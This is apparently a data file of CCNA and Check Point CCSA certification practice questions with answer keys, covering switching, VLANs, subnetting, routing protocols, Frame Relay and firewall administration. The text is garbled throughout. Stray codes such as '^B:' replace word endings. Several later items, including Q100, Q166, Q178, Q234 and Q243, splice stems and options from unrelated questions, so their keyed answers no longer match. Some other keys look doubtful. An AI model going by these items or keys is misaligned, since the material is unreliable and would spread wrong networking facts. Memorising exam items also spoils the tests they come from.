A,B,E	#CCNA Q. 276	Which connection allows the use of full-duplex Ethernet? (Choose three)	^A: Switch to host.	^B: Switch to switch.	^C: Hub to hu^B: ^D: Switch to hu^B:	^E: To host.						
A,B	#CCNA Q. 236 	Full Duplex Ethernet can operate between which of the following devices? (Choose two.) 	^A: Switch to host. 	^B: Switch to switch. 	^C: Hub to hu^B: 	^D: Switch to hu^B: 	^E: Hub to host. 					
B,D,F	#CCNA Q. 17	Which of the following statements are true regarding bridges and switches? (Choose three)	^A: Switches are primarily software based while bridges are hardware base^D:	^B: Both bridges and switches forward Layer 2 broadcasts.	^C: Bridges are frequently faster than switches.	^D: Switches have a higher number of ports than most bridges.	^E: Bridges define broadcast domains while switches define collision domains.	^F: Both bridges and switches make forwarding decisions based on Layer 2 addresses.				
B	#CCNA Q. 218 	Which statement about switched and routed data flow is correct? 	^A: Switches create a single collision domain and a single broadcast domain. Routers provide separate 	broadcast domains. 	^B: Switches create separate collision domains but a single broadcast domain. Routers provide a separate 	broadcast domains. 	^C: Switches create a single collision domain and a separate broadcast domain. Router provides a separate 	broadcast domain as well. 	^D: Switches create separate collision domains and separate broadcast domains. Routers provide separate 	collision domains. 		
D	#CCNA Q. 172	Which statement about Ethernet switches is true?	^A: Symmetric switching allows connection between ports of unlike bandwidth and does not require	memory bufferin^G:	^B: Memory buffering is used to prevent a bottleneck when ports of different bandwidth are connected	on a symmetric switch.	^C: The latency can be reduced if the switch utilizes the store and forward method of switchin^G: Store	and forward is better for error detection.	^D: The cut-trough method of switching is faster because the switch forwards the packet to the	destination as soon as it reads the destination address.		
D	#CCNA Q. 201	Which statement about the flow control function of TCP is True? 	^A: TCP makes no effort to check for lost or duplicate data packets. 	^B: The application layer must sequence data packets when using TCP. 	^C: TCP controls the flow of UDP data through negative acknowledgements NAK. 	^D: TCP is a connection-oriented protocol that acknowledges receipt of data packets and is considered reliable						
B	#CCNA Q. 99	Which statement about Ethernet networks is true?	^A: The advantage of a full duplex is the ability to transmit data over Mbase2 cable.	^B: Full duplex Ethernet requires a point-to-point connection when only two nodes are present.	^C: Ethernet switches can use full duplex mode to connect multiple nodes to a single port of a switch.	^D: Half duplex is a cut through packet processing method that is very fast with little error correction,	full duplex is store and forward method that is slower but has better error correction.					
A	#CCNA Q. 296	Hosts in the Sales Department are unable to access a new server at the remote office. Consider the IP addressing scheme in the accompanying graphic to determine the problem.	^A: The default gateway of the workstations in the sales department is incorrect.	^B: The subnet mask of the workstations in the sales department in incorrect.	^C: The default gateway of the server at the Remote Office is incorrect.	^D: The host address of the server at the Remote Office is invali^D:	^E: The serial 0 interface on the Home Office router and the serial 1 interface on the Remote Office router are not on the same subnetwork.					^D: Router RIP 
E	#CCNA Q. 51	Which of the following are true?	^A: The default is to send debug output to the console screen.	"^B: To view debug output from a telnet session, the ""terminal monitor"" command must be use^D:"	"^C: If the ""logging buffered"" command is used, the debug output would be sent to RAM and can be viewed"	"with the ""show log"" command."	"^D: If the ""no console logging"" command were configured, output would be sent to a telnet session."	^E: All of the above.				
C	#CCNA Q. 180	When you enter router password during the setup dialogue what is the difference between enable secret passwords?	^A: The enable password is encrypte^D:	^B: The enable secret password uses IPSec password authentication.	^C: The enable secret password cannot be seen as clear text when viewing the configuration.	^D: The enable secret password acts as a backup in case the enable password is compromise^D:		
C	#CCNA Q. 3	When setting up Frame Relay for point-to-point subinterfaces, which of the following must not be	^A: The Frame Relay encapsulation on the physical interface	^B: The local DLCI on each subinterface	^C: An IP address on the physical interface	^D: The subinterface type as point-to-point		
B	#CCNA Q. 272	What does IGRP use to determine the best path to a destination?	^A: The highest metric value.	^B: The lowest composite metric value.	^C: The lowest hop-count and delay.	^D: The highest bandwidth and reliability	^E: The lowest administrative distance.	
B	#CCNA Q. 36	A routing table contains static, RIP, and IGRP routes for the same destination network. Which route would normally be used to forward data?	^A: The IGRP route.	^B: The static route:	^C: The RIP route.	^D: All three will load balance.		
B	#CCNA Q. 155	When you use the Cisco ISO command show configuration on a router, which part of the output shows the specific configured IP addresses and subnet masks?	^A: The IP host table	^B: The interfaces output	^C: Each section of the output	^D: Each section of the output	^E: The global configuration statements	^F: The section under the autonomous system number
D	#CCNA Q. 117	Which statement is true when a broadcast is sent in an Ethernet/802.3 LAN?	^A: The IP subnet used is 255.255.255.0	^B: The IP address used is 255.255.255.255	^C: The MAC address used is 00-00-00-00-00-00	^D: The MAC address used is FF-FF-FF-FF-FF-F^F:		
A,B,C	#CCNA Q. 200	Which three pieces of CDP information about neighboring routers are displayed on your consoleterminal? (Choose three) 	^A: The neighboring routers host name 	^B: The neighboring routers hardware platform 	^C: Up to one address for each protocol supported 	^D: Up to two addresses for each protocol supported 	^E: As many addresses as are configured for each protocol supporte^D:	
C	#CCNA Q. 24	From the DOS command prompt, you are able to ping a router but are unable to telnet it. What is the most likely cause of the problem?	^A: The PC has a bad network interface car^D:	^B: The IP address of the router is on a different subnet.	^C: No password has been set on the router vty lines.	^D: The default gateway is not set on the P^C:	^E: The IP address of the workstation is incorrect.	
C	#CCNA Q. 262	A new host has been connected to a workgroup switch. Although its Layer 3 configuration is correct, the host is unable to access the server resources on its network segment. What .s the likely cause of this problem?	^A: The router lacks a routing table entry for the new host.	^B: The host switch port is assigned to the incorrect VLAN.	^C: The host MAC address is incorrectly configure^D:	^D: A VTP instance for the new host has not been installe^D:		
B	#CCNA Q. 78	What is not a characteristic of a network segment on a switch?	^A: The segment has its own collision domain.	^B: The segment can translate from one media to a different medi^A:	^C: All devices in the segment are part of the same broadcast domain.	^D: One device per segment can currently send frames to the switch.		
D	#CCNA Q. 123	Switching methods include cut-through, store and forwarded and a modified version of the first two methods. Which statement about switching methods is true?	^A: The stored and forward method has low latency.	^B: The cut through method and switching has high latency.	^C: The modified version holds the packet in memory until 50% of the packet reaches the switch.	^D: The modified version holds the packet in memory until the data portion of the packet reaches the	switch.	
A,B,D	#CCNA Q. 18	You need to add a new VLAN, named ACCOUNTS, to your switched network. Which of the following are true regarding configuration of this VLAN? (Choose three)	^A: The VLAN must be create^D:	^B: The VLAN must be name^D:	^C: An IP address must be configured for the ACCOUNTS VLAN.	^D: The desired ports must be added to the new VLAN:	^E: The VLAN must be added to the STP domain.	
A,D	#CCNA Q. 270	You have a Class B network address with a subnet mask of 255.255.255.0. Which of the following statements are true regarding the resulting network? (Choose two.)	^A: There are 254 usable hosts per subnet.	^B: There is one usable network.	^C: There are 255 usable hosts per subnet.	^D: There are 254 usable subnets.	^E: There are 30 usable subnets.	^F: There are 62 usable hosts per subnet.
B	#CCNA Q. 309	What is the purpose of DLCIs in Frame Relay?	^A: They determine the Frame Relay encapsulation type.	^B: They identify the logical circuit between a local router and a Frame Relay WAN switch.	^C: The represent the keepalives used to maintain the PVC in an active state.	^D: They represent the physical address of the router attached to a Frame Relay network.		
B,C,E	#CCNA Q. 257	Which of the following are benefits of VLANs? (Choose three)	^A: They increase the size of collision domains.	^B: They allow logical grouping of users by function.	^C: They enhance network security.	^D: They increase the size of broadcast domains while decreasing the number of broadcast domains.	^E: They increase the number of broadcasts domain while decreasing their size.	^F: The simplify switch administration.
D	#CCNA Q. 250 	What is the purpose of ISL and 802.lq frame tagging? 	^A: They provide best path determination. 	^B: The allow the exchange of filtering tables. 	^C: They specify different implementation of the Spanning-Tree Protocol. 	^D: They provide interswitch VLAN communication. 		
D,E	#CCNA Q. 152	What are two functions of ICMP protocol? (Choose Two)	^A: To map IP addresses to Ethernet addresses	^B: To map common names to network addresses	^C: To forward SNMP alerts to management consoles	^D: To generate an echo reply in response to a ping test	^E: To send a host or post unreachable message from a router to the source of an undeliverable packet	
B	#CCNA Q. 128	What is a key use of a device hardware address?	^A: To obtain a vendor code/serial number from the user.	^B: To transmit a frame from one interface to another interface	^C: To transmit a packet from one local device to another local device.	^D: To transmit data from one local device to remote device across Internet.	^E: To contain logical information about a device to use an end-to-end transmission.	
C	#CCNA Q. 251 	What is the purpose of Spanning-Tree in a switched LAN? 	^A: To provide a mechanism for network monitoring in switched environments. 	^B: To prevent routing loops in networks with redundant paths. 	^C: To prevent routing switching loops in networks with redundant switched paths. 	^D: To manage, the addition, deletion, and naming of VLANs across multiple switches. 	^E: To segment a network into multiple collision domains. 	
B,E	#CCNA Q. 294	Which of the following are reasons to use a bridge to segment a network? (Choose two.)	^A: To reduce broadcasts within collisions domains.	^B: To reduce collisions within broadcasts domain.	^C: To increase the number of broadcasts domains.	^D: To increase the broadcasts within collisions domains.	^E: To increase the number of collision domains.	^F: To increase the efficiency of routin^G:
A,C	#CCNA Q. 225 	What are two purposes for using switches? (Choose two) 	^A: To reduce collisions 	^B: To increase collisions 	^C: To increase the number of collision domains 	^D: To decrease the number of collision domains 	^E: To decrease the number of broadcast domains 	
A,C	#CCNA Q. 115	What are two purposes of segmenting a network with a bridge? (Choose two)	^A: To reduce collisions.	^B: To increase collisions.	^C: To add collision domains.	^D: To reduce collision domains.	^E: To have more broadcast domains.	
A,C,D,F	#CCNA Q. 281	What are possible causes of LAN traffic congestion? (Choose four.)	^A: Too many hosts in a broadcast domain.	^B: Full Duplex operation.	^C: Broadcast storms.	^D: Multicastin^G:	^E: Segmentation.	^F: Low bandwidth.
C	#CCNA Q. 29	If windows size is changed from 3000 to 4000 during the data transfer stage of a TCP session, what can a sending host do?	^A: Transmit 3000 bytes before waiting for an acknowledgement.	^B: Transmit 4000 packets before waiting for an acknowledgement.	^C: Transmit 4000 bytes before waiting for an acknowledgement.	^D: Transmit 4000 segments before waiting for an acknowledgement.	^E: Transmit 3000 frames before waiting for an acknowledgement.	
A	#CCNA Q. 203	The ICMP (referred to in RFC 1700) is implemented by all TCP/IP hosts? 	^A: TRUE 	^B: FALSE 				
A	#CCNA Q. 204 	IPX traffic using different encapsulation types can go over the same datalink. 	^A: TRUE 	^B: FALSE 				
D	#CCNA Q. 182	How do you get help on a command after you have received  - % INCOMPLETE COMMAND'  response from a switch CLI?	^A: Type -history-  to review the prompt before the error.	^B: Enter a question mark to display all console commands	^C: Type \ldblquote help\rdblquote  followed by the command to see the command parameter	^D: Re enter the command followed by question mark to view key words		
A,B	#CCNA Q. 209 	In which two modes can the ICMP ping command be used? (Choose two) 	^A: User 	^B: Privileged 	^C: Global Configuration 	^D: Interface Configuration 		
A	#CCNA Q. 280	Question on PPP authentication. We have two Cisco routers with the hostnames Router1 and Router2. Router1 uses username Router2 and password PassRouter1. How would you set the username and password on Router2 for PPP authentication between Router1 and Router2?	^A: Username Router1 password PassRouter1	^B: Username Router2 password PassRouter1	^C: Username Router1 password PassRouter2	^D: Username Router2 password PassRouter2		
A	#CCNA Q. 68	A router on one side of a PPP link uses the host name RTR1 and the password CORP1-PWD. Which configuration line on RTR1 enables the connection between RTR1 and other router named RTR2?	^A: Username RTR2 password CORP1-PWD	^B: Username RTR1 password CORP1-PWD	^C: Username RTR2 password CORP2-PWD	^D: Username RTR1 password CORP2-PWD		
B	#CCNA Q. 220 	What was the key reason the International Organization for Standardization released the OSI model? 	^A: Users could access network server faster. 	^B: Different vendors networks could work with each other. 	^C: The industry could create a standard for how computers work. 	^D: The network administrator could increase the overall speed of their network. 		
D	#CCNA Q. 124	Which technology do catalyst switches use to resolve topology loops and ensure data use flows properly through a single network path?	^A: Virtual LANs.	^B: Frame filterin^G:	^C: Cut through switchin^G:	^D: Spanning tree protocol.		
C,D,E,F	#CCNA Q. 121	What are 4 ways network management can be simplified by using the virtual LANs (VLANs)? (Choose four)	^A: VLANs allow you to implement multiple layers switching easily.	^B: VLAN can group several broadcasts domains into multiple logical subnets.	^C: It is no longer necessary to install cables to move a user from a new network to another.	^D: Network adds, moves and changes are achieved by configuring a port into a VLAN.	^E: A group of users needing high security can be put into a VLAN so that no users outside the VLANs	can communicate with them.	^F: As a logical grouping of users, VLANs can be considered independent from their physical or	geographic locations.
A,E,F	#CCNA Q. 61	In which three situations is a hold-down timer reset? (Choose three:)	^A: When the hold-down timer expires.	^B: When infinity is finally defined as some maximum number.	^C: When the router exchanges update summaries at area borders.	^D: When the router detect faulty LSPs propagating through the internetwork.	^E: When another update is received indicating a new route with a better metri^C:	^F: When another update is received indicating the original route to the network has been restore^D:	^G: When the router receives a processing task proportional to the number of links in the internetwork.	
A	#CCNA Q. 77	Which statement is true?	^A: While bridges are used to segment networks they will not isolate broadcast or multicast packets.	^B: A bridge looks at every packet with in its network segment and works like a hub, rebroadcasting	the packet if the destination is with in its network segment.	^C: A bridge maintains a table of the IP addresses of the hosts with in its network segment and	forwards the packet directly to the destination based upon the IP address.	^D: Bridge resets the hop count by keeping all packets within the network segment only packets	addressed to its specific destination host outside the network segment are allowed to pass through the bridge.:
A	#CCNA Q. 187	Which statement about half-duplex Ethernet operation is true?	^A: With half duplex transmission frames feed into a single cable in one direction at a time.	^B: Half duplex transmission between stations is achieved by using point-to-point Ethernet and fast	Ethernet connection.	^C: Half duplex transmission between stations is achieved by using point to multi point Ethernet and fast	Ethernet connection.	^D: Half duplex Ethernet technology provides a transmit circuit connection wired directly to the receiver	circuit at the other end of the connection.	
C	#CCNA Q. 297	Company ABC has just added an employee workstation to its network. The employee is unable to connect to the server at IP address 192.168.10.98/27. Identify the incorrectly configured network parameter.	^A: workstation IP address.	^B: workstation subnet mask.	^C: workstation default gateway.	^D: router interface E0 IP address.				
D	#CCNA Q. 278	Which WAN technology was designed to work over traditional phone lines and provide small offices and user with higher speed digital dial-up service?	^A:frame relay	. x.25	^C: ATM	^D: ISDN				
B,F	#CCNA Q. 34	Given the following routing table entry, which of the following are used by default in the calculation of the number 1200? (Choose two.) 172.16.0.0 [100/1200] via 192.168.16.3, 00:00:55, Ethernet1	^A: MTU	^B: bandwidth	^C: administrative distance	^D: hop count	^F: delay			
A	#CCNA Q. 73	Which statement about the specialized IP addresses shown in the EXHIBIT is true? EXHIBIT: 10.0.0.0 to 10.255.255.255	172.16.0.0 to 172.31.255.255	192.168.0.0 to 192.168.255.255	^A: They are private IP addresses.	^B: They can not be leased with DHCP.	^C: They are allocated for VOL PVOLP.	^D: They represent IP classless addresses.	^E: They are used by the inter NIC for administration.	
C	#CCNA Q. 136	Given the following IP address from the Class B address range: 172.35.21.12 Your network plan requires no more than 126 hosts on a subnet that includes this address. When you configure the IP address in Cisco IOS software, which value should you use as the subnet mask?	^A: 255.255.0.0	^B: 255.255.128.0	^C: 255.255.255.128	^D: 255.255.255.252				
A	#CCNA Q. 197	Company XYZ has an employee that works out of the home. The employee runs big client-server applications and must quickly transfer large files. The company wants the best cost/benefit on this connection. What would be the most practical solution?	^A: An ISDN basic rate interface (BRI) connection to the users home .	^B: A dedicated T1 connection to the users home.	^C: A dedicated Frame Relay connection to the users home.	^D: A standard 28.8 analogue dial up connection to the users home				
D	#CCNA Q. 193	Given the following criteria for granting access from a remote site to your LAN : restrict access on interface E0	E0=128.12.22.55	Deny access to telnet, FTP	All other types of operations.	Which line should come last in configuring your access list?	^A: Access-List 101	^B: Access-List 101 deny E0 telnet FTP	^C: Access list 101 allow all except FTP telnet	^D: Access list 101 permit IP 0.0.0.0 255.255.255.255 any
E	#CCNA Q. 163	Which line from a show spantree one-command output indicates that Virtual LAN1 (VLAN1) is functioning properly?	^A: Root mode is fast Ethernet 0/26.	^B: Port Ethernet 0/1 of VLAN is forwardin^G:	^C: Designated port in Ethernet 0/1 path cos10.	^D: Designated root has priority 0, address 0000.588fb600	^E: VLAN1 is executing the IEEE compatible spanning tree protocol.			
B	#CCNA Q. 221 	Each department has its own file server and the company has an enterprise server that is shared by all  departments. What does a network administrator use to provide a secure separation between the management and sales department? 	^A: Bridge between management and sites. 	^B: Routers to provide the most secure segmentation. 	^C: A hub to provide the ease of management and a satisfactory alternative for the network security. 	^D: An Ethernet switch to secure separation through programming the access list of each port of the switch. 				
D	#CCNA Q. 153	Novell IPX network addresses have two configurable parts. The network administrator specifies the IPX  network number. How is the node number determined?	^A: It is the serial number of the given device.	^B: It is assigned as a lease by Novell DHCP.	^C: It is also set by the network administrator.	^D: It is usually the MAC address of one interface.	^E: It is downloaded by NetWare Core Protocol (NCP).			
B	#CCNA Q. 30	Users on network 192.168.69.0/28 are complaining that they cannot access the corporate intranet server at www.inhouse:com. In troubleshooting this problem, you find that you are able to telnet a workstation on this network to the internal webserver via its IP address. What is the likely cause of this problem? Other divisions in the company use applications that require less than 2 Mbps bandwidth of the enterprise server	^A: TCP/IP failure	^B: DNS failure	^C: FTP failure					
C	#CCNA Q. 100	On a network design project you determine that a new testing application requires multiple hosts. These hosts must be capable of sharing data between each host and an enterprise server at 10 Mbps bandwidth. system image that is run in Flash?	^A: Copy flash tftp	What is your economical recommendation?	^A: That the existing 10BaseT hub be replaced with 100BaseT hub to improve overall performance.	^B: That a router can separate the testing application from the rest of the network thus allowing the	testing application more bandwidth.	^C: That the switch be installed so that enterprise server can be provided a 100 Mbps port and each	of the testing application hosts can be given dedicated 10 Mbps ports.	
A	#CCNA Q. 178	Which command should you use to configure a router so that it can become a TFTP host for router	transmission session on the other device are successful. What is the default that you must enter to	suspend your Telnet session and return to the original router?	^B: Config tftp server	^C: Write network <router name>	^D: Tftp-server system <filename>	^E: Setup server tftp <systemname>	
E	#CCNA Q. 166	While you are preparing the initial configuration of your router and enable IP you find that you need to use a telnet session to check for a network address parameter. Your telnet logging and your virtual	Which layer of the protocol stack is the network administrator using for this operation? 	^A: application 	^A: Suspend	^B: The command exit	^C: CTRL \endash  ESC followed by x	^D: CTRL \endash  ALT \endash  DEL followed b ESC	^E: CTRL- Shift-6 followed by x
A	#CCNA Q. 243 	A network administrator is verifying the configuration of a newly installed host by establishing an ftp  connection to a remote server. 	Which of the following are required to allow remote management of the switch over IP? (Choose two.) 	^A: The Frame Relay encapsulation on the physical interface. 	^B: presentation 	^C: session 	^D: transport 	^E: data link 	^F: internet 
C	#CCNA Q. 234 	You are configuring a new catalyst switch that you want to manage remotely from workstations on other network segment within your enterprise. you configure for 5 bits of subnetting when you configure for this in the Cisco IOS software. Which subnet mask should you use? 	^B: The local DLCI on each subinterface. 	^C: An IP address on the physical interface. 	^D: The subinterface type as point-to-point 				
D	#CCNA Q. 219 	Given the following IP address from the class C address range 192.168.21.12 your network plan needs  addresses for twenty-eight small offices. Each office uses its own subnet. The network designs specify that 	^A: 255.255.0.28 	^B: 255.255.255.0 	^C: 255.255.255.28 	^D: 255.255.255.248 	^E: 255.255.255.252 		
4ad1.021f.2cfe.8322	#CCNA Q. 39:	A host with a MAC address of 021f.2cfe.8322 is to be inserted into IPX network 4ad1. Enter the IPX address for this host.							
255.255.255.224	#CCNA Q. 264	A small enterprise has a class C network license The enterprise requires five usable subnets, each capable of accommodating at least 18 hosts. Enter the appropriate subnet mask below.							
255.255.255.224	#CCNA Q. 311	A small enterprise has class C network license The enterprise requires 5 usable subnets, each capable of accommodating at least 18 hosts. Enter the appropriate subnet mask below.								
router rip	#CCNA Q. 232	Enter the command to start IP, RIP version1 routing on a Cisco router? 							
DECIMAL:170 HEXADECIMAL:AA	#CCNA Q.315	What is the decimal and hexadecimal equivalent of the binary number 10101010?							
D	#CCNA Q. 1:	Your Ethernet network, 172.30.1.0, shuts down. Which update message is seen in your router's debug ip rip output regarding that network?^A: subnet 172.30.1.0,metric 0	^B: subnet 172.30.1.0, metric 1	^C: subnet 172.30.1.0, metric 15	^D: subnet 172.30.1.0, metric			 				
A 	#CCSA Q1.  The VPN1 NG User Interface consists of which of the following elements? ^A.  Security Policy Editor, Visual Policy Editor and Object tree view.   ^B.  Management Server and VPN1 Module. ^C.  Visual Policy Editor, Object Tree view and inspection Module. ^D.  Security Policy Server, System GUI and Module Log Viewer. ^E.  VPN1 Module, Inspection Module and Security Server. 
A 	#CCSA Q3.  As a VPN1 administrator, you have an undistributed range of IP addresses for which you want to perform address translation. You can simplify your efforts through the use of ADDRESS RANGE. ^A.  True ^B.  False 
D 	#CCSA Q5. You are working with multiple firewalls that have extensive Rule Bases. To simplify administration task, which of the following should you choose to do? ^A.  Create Network range objects that restrict all applicable rules to only certain networks. ^B.  Run separate GUI clients for external and internal firewalls. ^C.  Eliminate all possible contradictory rules such as stealth and clean-up rules. ^D.  Save a different Rule Base for each remote firewall. ^E.  None of the above. 
B 	#CCSA Q6.  Currently, the Accounting Department is FTP-ing a file in the bank. Which Log Viewer Module would show you the activity occurring at the present time? ^A.  Security Log. ^B.  Active Connections Log. ^C.  Accounting Log- ^D.  Administrative Log. ^E.  None of the above. 
A 	#CCSA Q7.  With Blocking Scope default settings, a selected connection is terminated: ^A.  And all further attempts to establish a connection from the same source IP address to the same destination IP address and port will be blocked. ^B.  But all further attempts to establish connections from this specific source IP address will be authenticated before being denied. ^C.  And all further attempts to establish connections to this specific destination IP address will be denied. ^D.  And all further attempts to establish a connection from the same source IP address to the firewall's IP address will be blocked. ^E.  Both A and D. 
C 	#CCSA Q11. Changes made to the Security Policy do not take effect on the Enforcement Module until the administrator performs which of the following actions? ^A.  Saves the policy. ^B.  Verifies the policy. ^C.  Install the policy. ^D.  Stops firewall services on the Enforcement Module. ^E.  Stops firewall services on the Management module. 
A 	#CCSA Q13. The fw fetch command perform the following function: ^A.  Attempts to fetch the policy from the Management Server. ^B.  Fetches users from the Management server. ^C.  Produces an output screen of the Rule Base. ^D.  Fetches the logs. ^E.  Fetches the systems status. 
E 	#CCSA Q14. Inclement weather and a UPS-failure cause a firewall to reboot. ^  Earlier that day a tornado destroyed the building where the firewall's Management Module was located. ^  The Management Module was not recovered and has not been replaced. ^  Bases on the scenario, which of the following statements is FALSE? ^A.  The firewall will continue to enforce the last rule base installed. ^B.  The firewall will log locally. ^C.  The firewall will fetch the last installed policy form local host and install it. ^D.  Communication between the firewall and the replacement Management Module must be established before the replacement Management Module can install a policy on the firewall. ^E.  Because the firewall cannot contact the Management Module, no policy will be installed. 
C 	#CCSA Q15. When configuring Anti1 NG on the firewall interfaces, all of the following are valid address choices except: ^A.  Network defined by Interface IP and Net Mask. ^B.  Not Defined. ^C.  Security Policy Installed. ^D.  Specific ^E.  None of the above. 
C 	#CCSA Q17.  Assume that you are working on a Windows NT operating system. What is the default expiration for a Dynamic NAT connection NOT showing any UDP activity? ^A.  30 Seconds.   ^B.  60 Seconds.    ^C.  40 Seconds.   ^D.  600 Seconds.  ^E.  3000 Seconds. 
B 	#CCSA Q18. Assume there has been no change made to default policy properties. ^  To allow a telnet connection into your network, you must create two rules. ^  - One to allow the initial Telnet connection in. ^  - One to allow the destination machine to send information back to the client. ^A.  True ^B.  False 
E 	#CCSA Q19. In Windows NT to force log entries other than the default directory. ^A.  You must use the cpconfig command.   ^B.  Change the fwlog environment variable. ^C.  Modify the registry. ^D.  Change the directory in log viewer. ^E.  Use the fw log switch command. 
A 	#CCSA Q20. For most installations, the Clean-Up rule should be the last rule in Rule Base. ^A.  True ^B.  False 
B 	#CCSA Q21.  What complements are necessary for VPNmail, passing through the firewall, for macro viruses? ^A.  UFP and OPSEC-certified scanning product. ^B.  CVP and OPSEC-certified virus scanning product. ^C.  UFP and CVP. ^D.  UFP, CVP and OPSEC-certified content filter. ^E.  None of the above, VPN1 NG scans for macro viruses by default. 
C 	#CCSA Q22. Why would you want to verify a Security Policy before installation? ^A.  To install Security Policy cleanly. ^B.  To check up the enforcement-point firewall for errors. ^C.  To identify conflicting rules in your Security Policy. ^D.  To compress the Rule Base for faster installation ^E.  There us no benefit verifying a Security Policy before installing it. 
B 	#CCSA Q23. To completely setup Static NAT, you ONLY have to select Add Automatic Address Translation rules on the NAT tab, and specify a public NAT IP address. ^A.  True ^B.  False 
B 	#CCSA Q24. If you configure the Minutes interval for a firewall in the User Authentication session timeout box, as shown below on the Authentication Tab of the Workstations properties window, users of one time password must re-authenticate for each request during this time period. ^A.  True ^B.  False 
D 	#CCSA Q25. What does a status of Untrusted tell you? ^A.  A VPN1 NG firewall module has been compromised. ^B.  A gateway cannot be reached. ^C.  A module is installed and responding to status checks, but the status is problematic. ^D.  A gateway is connected, but the management module is not the master of the module installed on the gateway. ^E.  None of the above. 
D 	#CCSA Q29.  How do recover communications between your management module and enforcement module if you lock yourself out via a rule policy that is configured incorrectly? ^A.  Cp delete all all. ^B.  Cp pause all all.  ^C.  Cp stop all all.    ^D.  Cp unload all all. ^E.  Cp push all all. 
C 	#CCSA Q30. You have set up a firewall and management module on one NT box and a remote module on a  different location. ^  You receive only sporadic logs from the local firewall and only and control message from remote firewall. ^  All rules on both firewalls are logging and you know the traffic is flowing through the firewall using these rules. ^  All the firewall related services are running and you are using NAT and you receive few logs from the local firewall. ^  What actions from the choices below would you perform to find out why you cannot see logs? ^A.  Make sure there is no masters file in SFWDIR/conf on the remote module. ^B.  Make sure there is no masters file in SFWDIR/conf on the local NT box. ^C.  See if you can do a fwfetch from the module. ^D.  Run the fw logexport n from the command line prompt on the remote module. ^E.  Use pulist.exe from the Windows NT resource kit. 
B 	#CCSA Q31. As a firewall administrator you encounter the following error message: ""Authentication for command failed."" ^  What is the most logical reasoning for this type of error message? ^A.  The Rule Base has been corrupted. ^B.  The kernel cannot communicate with the management module. ^C.  The administrator does not have the ability to push the policy. ^D.  Remote encryption keys cannot be fetched. ^E.  Client authentication has failed. "
A 	#CCSA Q32. Your customer has created a rule so that every time a user wants to go to the Internet, that user must be authenticated. ^  Firewall load is a concern for the customer. ^  Which authentication method does  not result in any additional connections to the firewall? ^A.  Session ^B.  User ^C.  Client ^D.  Connection ^E.  None of the above. 
D 	#CCSA Q33. What variable is used to extend the interval of the Timeout in a NAT to prevent a hidden UDP connection from losing its port? ^A.  Fwx_udp_todefaultextend.  ^B.  Fwx_udp_expdefaultextend. ^C.  Fwx_udp_todefaultext ^D.  Fwx_udp_timeout. ^E.  Fwx_udp_expiration. 
D 	#CCSA Q34. To hide data filed in the log viewer: ^A.  Select Hide from the Log Viewer menu. ^B.  Right-click anywhere in a column of the Log Viewer GUI and select Show Details. ^C.  Right-click anywhere in the column of the Log Viewer GUI and select Disable. ^D.  Right-click anywhere in the column of the Log Viewer GUI and select Hide. ^E.  Select Hide from the Log Viewer tool bar. 
D 	#CCSA Q35. You are following the procedure to setup user authentication for TELNET to prompt for a distinct destination. ^   This allows the firewall to simulate a TELNET Proxy. ^  After you defined the user on the Firewall and use VPN1 Authentication, you would: ^A.  Stop the Firewall. ^B.  Restart the Firewall. ^C.  Start the Policy Editor and go to Manage service, and edit TELNET service. ^D.  Ensure that the Authentication method is enabled in the firewall object. ^E.  Ensure that there are no existing rules already allowing TELNET. 
E 	#CCSA Q37. What is the software package through which all Check Point products use infrastructure services? ^A.  Cpstart/cpstop. ^B.  Check Point Registry. ^C.  CPD ^D.  Watch Dog for critical services. ^E.  SVN Foundation. 
A 	#CCSA Q38. Choose the BEST response to finish this statement.     ^   A Firewall: ^A.  Prevents unauthorized to or from a secured network.    ^B.  Prevents unauthorized to or from a unsecured network. ^C.  Prevents authorized access to or from an Intranet. ^D.  Prevents authorized access to or from an Internet. ^E.  Prevents macro viruses from infecting the network. 
E 	#CCSA Q39. Where is the external if file located in VPN1/Firewall-1 NG? ^A.  FWDIR conf directory. ^B.  Database directory. ^C.  State directory. ^D.  Temp Directory. ^E.  Not used in VPN1/Firewall-1 NG. 
E 	#CCSA Q40.  Which log viewer mode allows you to actually see the contents of the files HTTP-ed by the corporation's Chief Executive Officer? ^A.  Security Log. ^B.  Active Connections Log. ^C.  Accounting Log. ^D.  Administrative Log. ^E.  None of the above. 
E 	#CCSA Q41.  When you select the alert radio button on the topology tab of the interface properties window: ^A.  The action specified in the Action element of the Rule Base is taken. ^B.  The action specified in the Anti-Spoofing Alert field in the Global properties window is taken. ^C.  The action specified in the Pop up Alter Command in the Global properties window is taken.  ^D.  Both A and ^B. ^E.  Both B and ^C. 
D 	#CCSA Q42. You are the firewall administrator with one management server managing one firewall. The system status displays a computer icon with a '!' symbol in the status column. ^  Which of the following is the most likely cause? ^A.  The destination object has been defined as external. ^B.  The Rule Base is unable to resolve the IP address. ^C.  The firewall has been halted. ^D.  The firewall is unprotected, no security policy is loaded. ^E.  Nothing is wrong. 
B 	#CCSA Q43.  System Administrators use session authentication when they want users to: ^A.  Authenticate each time they use a supported service. ^B.  Authenticate all services. ^C.  Use only TENET, FTP, RLOGIN, and HTTP services. ^D.  Authenticate once, and then be able to use any service until logging off. ^E.  Both B and D 
B 	#CCSA Q44.  Your customer has created a rule so that every time a user wants to go to Internet, that user must be authenticated. ^  The customer requires an authentication scheme that provides transparency for the user and granular control for the administrator. ^  User must also be able to log in from any location. ^  Based on this information, which authentication schemes meets the customer's needs? ^A.  Session ^B.  User     ^C.  Client   ^D.  Dual     ^E.  Reverse 
B 	#CCSA Q45.  Implementing Dynamic NAT would enable an internal machine behind the firewall to act as an FTP Server for external clients. ^A.  True ^B.  False 
E 	#CCSA Q46. The Enforcement Module (part of the VPN1 Module): ^A.  Examines all communications according to an Enterprise Security Policy. ^B.  Is installed on a host enforcement point. ^C.  Can provide authentication and Content Security features at the application level. ^D.  Is usually installed on a multi-homed machine. ^E.  All of the above. 
C 	#CCSA Q47. In most cases when you are building the Rule Base you should place the Stealth Rule above all other rules except: ^A.  Clean up rules. ^B.  Implicit Riles. ^C.  Client Authentication Rules. ^D.  Pseudo Rules. ^E.  Default Rules. 
A 	#CCSA Q48.  If you change the inspection order of any of the implied rules under the Security Policy Setup, does it change the order in which the rules are enforced? ^A.  True ^B.  False 
A 	#CCSA Q49. The fw fetch command allows an administrator to specify which Security Policy a remote enforcement module retrieves. ^A.  True ^B.  False 
B 	#CCSA Q50.  You can edit VPE objects before they are actualized (translated from virtual network objects to real). ^A.  True ^B.  False. 
